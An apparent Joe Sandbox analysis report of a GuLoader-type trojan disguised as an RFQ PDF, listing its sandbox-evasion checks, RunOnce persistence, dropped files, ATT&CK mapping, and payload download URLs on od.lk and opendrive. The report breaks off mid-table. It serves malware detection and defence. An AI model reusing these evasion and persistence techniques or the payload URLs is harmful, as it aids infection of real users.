        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeRDTSC instruction interceptor: First address: 5E51EE9 second address: 5E51EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646C5233ADh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeRDTSC instruction interceptor: First address: 2271EE9 second address: 2271EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646CC2BB2Dh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe TID: 7968Thread sleep count: 70 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe TID: 1772Thread sleep count: 70 > 30Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_00402645 FindFirstFileA,4_2_00402645
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_00405FE2 FindFirstFileA,FindClose,4_2_00405FE2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040559E
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: Amcache.hve.7.drBinary or memory string: VMware
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.000000000381F000.00000004.00000020.00020000.00000000.sdmp, RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.0000000003668000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.7.drBinary or memory string: vmci.sys
        Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4388
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4390
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess created: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe" Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00405D00 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D00
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Increases the number of concurrent connection per server for Internet Explorer
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		11
        Registry Run Keys / Startup Folder        		11
        Process Injection        		3
        Masquerading        		OS Credential Dumping311
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        Endpoint Denial of Service
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		11
        Registry Run Keys / Startup Folder        		1
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over Bluetooth1
        System Shutdown/Reboot
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		11
        Process Injection        		Security Account Manager4
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS24
        System Information Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617166 Sample: RFQ_SRC02252017-pdf.scr.exe Startdate: 17/02/2025 Architecture: WINDOWS Score: 96 32 web.opendrive.com 2->32 34 od.lk 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected GuLoader 2->42 44 Sigma detected: New RUN Key Pointing to Suspicious Folder 2->44 46 2 other signatures 2->46 8 RFQ_SRC02252017-pdf.scr.exe 3 59 2->8         started        12 microminiaturise.exe 28 2->12         started        signatures3 process4 file5 24 C:\Users\user\AppData\...\minirobot.uni, DOS 8->24 dropped 26 C:\Users\user\AppData\Local\...\System.dll, PE32 8->26 dropped 28 C:\Users\user\...\microminiaturise.exe, PE32 8->28 dropped 48 Tries to detect virtualization through RDTSC time measurements 8->48 50 Switches to a custom stack to bypass stack traces 8->50 14 RFQ_SRC02252017-pdf.scr.exe 4 14 8->14         started        30 C:\Users\user\AppData\Local\...\System.dll, PE32 12->30 dropped 52 Multi AV Scanner detection for dropped file 12->52 18 microminiaturise.exe 14 12->18         started        signatures6 process7 dnsIp8 36 od.lk 38.108.185.115, 443, 49759, 50013 COGENT-174US United States 14->36 38 web.opendrive.com 38.108.185.71, 443, 49765, 50014 COGENT-174US United States 14->38 54 Increases the number of concurrent connection per server for Internet Explorer 14->54 20 WerFault.exe 21 16 14->20         started        22 WerFault.exe 1 21 18->22         started        signatures9 process10

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        RFQ_SRC02252017-pdf.scr.exe27%ReversingLabsWin32.Trojan.NsisInject
        RFQ_SRC02252017-pdf.scr.exe38%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe27%ReversingLabsWin32.Trojan.NsisInject
        C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe38%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll0%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\minirobot.uni0%ReversingLabs
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\minirobot.uni0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        od.lk
        		38.108.185.115
        		truefalse
          		high
          web.opendrive.com
          		38.108.185.71
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://od.lk/d/MzdfMzIyNjM2NDFf/DgaYM84.binfalse
              		high
              https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inline=0false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://od.lk/zmicrominiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0~microminiaturise.exe, 0000000A.00000002.3338788769.00000000036A2000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://od.lk/RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://web.opendrive.com/4microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorRFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.drfalse
                          		high
                          https://od.lk/J~Z_RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://web.opendrive.com/autmicrominiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://web.opendrive.com/ERFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2316123890.0000000003833000.00000004.00000020.00020000.00000000.sdmp, RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.0000000003833000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://web.opendrive.com/LMEMRFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://upx.sf.netAmcache.hve.7.drfalse
                                    		high
                                    http://nsis.sf.net/NSIS_ErrorErrorRFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.drfalse
                                      		high
                                      https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inmicrominiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://web.opendrive.com/microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://web.opendrive.com/uRFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            38.108.185.71
                                            		web.opendrive.comUnited States
                                            		174COGENT-174USfalse
                                            38.108.185.115
                                            		od.lkUnited States
                                            		174COGENT-174USfalse

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1617166
                                            Start date and time:2025-02-17 15:48:55 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 8s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
                                            Number of analysed new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:RFQ_SRC02252017-pdf.scr.exe
                                            Detection:MAL
                                            Classification:mal96.phis.troj.evad.winEXE@8/26@3/2
                                            EGA Information:
                                            • Successful, ratio: 33.3%
                                            HCA Information:
                                            • Successful, ratio: 81%
                                            • Number of executed functions: 55
                                            • Number of non-executed functions: 73
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.168.117.173, 20.109.210.53, 13.107.246.45, 40.126.32.136
                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                            • Execution Graph export aborted for target RFQ_SRC02252017-pdf.scr.exe, PID 7724 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            14:50:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Befolkningsgruppe C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe
                                            14:51:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Befolkningsgruppe C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            38.108.185.71HEUR-Backdoor.MSIL.Crysan.gen-4b7c7ecab6728bb.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                              38.108.185.115rAE09579G0033855AEDXBFFHHHHJ-VC.exeGet hashmaliciousRemcosBrowse
                                                rAE09579Q0033388AEDXB1092.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  r000_ScannedwithXeroxMultifunctionPrinter.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    rELITETRADINGLL.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      rquotation.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        Ld3pkWLjgX.exeGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                          https://od.lk/f/NjNfMjQ2Mjc1OTRfGet hashmaliciousUnknownBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            od.lkrAE09579G0033855AEDXBFFHHHHJ-VC.exeGet hashmaliciousRemcosBrowse
                                                            • 38.108.185.115
                                                            rAE09579Q0033388AEDXB1092.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.115
                                                            r000_ScannedwithXeroxMultifunctionPrinter.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.115
                                                            rELITETRADINGLL.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.115
                                                            rquotation.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.115
                                                            Ld3pkWLjgX.exeGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                            • 38.108.185.115
                                                            https://od.lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024.pdfGet hashmaliciousUnknownBrowse
                                                            • 184.105.177.70
                                                            purchae order notification!!!purchae order notification!!!.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 38.108.185.79
                                                            https://od.lk/f/NjNfMjQ2Mjc1OTRfGet hashmaliciousUnknownBrowse
                                                            • 38.108.185.115
                                                            web.opendrive.comrAE09579G0033855AEDXBFFHHHHJ-VC.exeGet hashmaliciousRemcosBrowse
                                                            • 38.108.185.67
                                                            rAE09579Q0033388AEDXB1092.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.65
                                                            r000_ScannedwithXeroxMultifunctionPrinter.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.69
                                                            rELITETRADINGLL.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.63
                                                            rquotation.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 38.108.185.68
                                                            Ld3pkWLjgX.exeGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                            • 38.108.185.65
                                                            https://od.lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024.pdfGet hashmaliciousUnknownBrowse
                                                            • 184.105.177.74
                                                            HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                            • 184.105.177.72
                                                            HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                            • 184.105.177.77

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            COGENT-174USHilix.spc.elfGet hashmaliciousMiraiBrowse
                                                            • 38.184.96.227
                                                            PO240145.exeGet hashmaliciousFormBookBrowse
                                                            • 38.11.157.207
                                                            QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                            • 38.11.157.207
                                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                                            • 38.37.11.80
                                                            rAE09579G0033855AEDXBFFHHHHJ-VC.exeGet hashmaliciousRemcosBrowse
                                                            • 38.108.185.115
                                                            rAE09579Q0033388AEDXB1092.exeGet ha